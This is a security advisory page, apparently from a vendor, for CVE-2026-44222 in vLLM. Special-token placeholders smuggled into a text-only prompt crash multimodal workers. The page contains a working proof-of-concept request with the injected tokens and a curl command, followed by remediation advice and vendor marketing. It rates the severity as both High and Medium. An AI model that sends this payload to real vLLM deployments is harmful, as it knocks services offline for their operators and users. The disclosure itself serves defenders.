CVE-2026-44222

CVE-2026-44222 is a medium-severity security vulnerability in vllm (pip), affecting versions >= 0.6.1, < 0.20.0. It is fixed in 0.20.0.

Summary

This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.

Details

  • Affected component: multimodal input position computation.
  • File/functions (paths are indicative):
    • vllm/model_executor/layers/rotary_embedding.py
      • get_input_positions_tensor(...)
      • _vl_get_input_positions_tensor(...)
  • Failure mechanism:
    • The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly.
    • When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.

Representative snippet (context):

# vllm/model_executor/layers/rotary_embedding.py
@classmethod
def _vl_get_input_positions_tensor(
    cls,
    input_tokens,
    hf_config,
    image_grid_thw,
    video_grid_thw,
    ...,
):
    # detect video tokens
    video_nums = (vision_tokens == video_token_id).sum()
    # later in processing
    t, h, w = (
        video_grid_thw[video_index][0],  # IndexError if no video data
        video_grid_thw[video_index][1],
        video_grid_thw[video_index][2],
    )

Abbreviated call path:

OpenAI API request
 → vllm.v1.engine.core: step/execute_model
 → vllm.v1.worker.gpu_model_runner: _update_states/execute_model
 → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor
 → _vl_get_input_positions_tensor
 → IndexError: list index out of range

PoC

Environment

  • vLLM: 0.10.0
  • Model: Qwen/Qwen2.5-VL-3B-Instruct
  • Launch server:
python -m vllm.entrypoints.openai.api_server \
  --model Qwen/Qwen2.5-VL-3B-Instruct \
  --port 8000

Request (text-only, no image/video data)

cat > request.json <<'JSON'
{
  "model": "Qwen/Qwen2.5-VL-3B-Instruct",
  "messages": [
    {
      "role": "user",
      "content": [
        { "type": "text",
          "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" }
      ]
    }
  ]
}
JSON

curl -s http://127.0.0.1:8000/v1/chat/completions \
  -H 'Content-Type: application/json' \
  --data @request.json

Observed result

  • HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...).
  • In some deployments, the worker exits and capacity remains reduced until manual restart.

Fixes

Credits

Pengyu Ding (Infra Security, Ant Group)
Ziteng Xu (Infra Security, Ant Group)

Impact

  • Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault.
  • Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts).
  • Effect: Request → unhandled exception in position computation → worker termination / service unavailability.

CVE-2026-44222 has a CVSS score of 6.5 (Medium). The vector is network-reachable, low privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.20.0); upgrading removes the vulnerable code path.

Affected versions

vllm (>= 0.6.1, < 0.20.0)

Security releases

vllm → 0.20.0 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade vllm to 0.20.0 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-44222? CVE-2026-44222 is a medium-severity security vulnerability in vllm (pip), affecting versions >= 0.6.1, < 0.20.0. It is fixed in 0.20.0.
  2. How severe is CVE-2026-44222? CVE-2026-44222 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of vllm are affected by CVE-2026-44222? vllm (pip) versions >= 0.6.1, < 0.20.0 is affected.
  4. Is there a fix for CVE-2026-44222? Yes. CVE-2026-44222 is fixed in 0.20.0. Upgrade to this version or later.
  5. Is CVE-2026-44222 exploitable, and should I be worried? Whether CVE-2026-44222 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-44222 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-44222? Upgrade vllm to 0.20.0 or later.

Other vulnerabilities in vllm

CVE-2026-54233CVE-2026-54236CVE-2026-53923CVE-2026-12491CVE-2026-48746

Stop the waste.
Protect your environment with Kodem.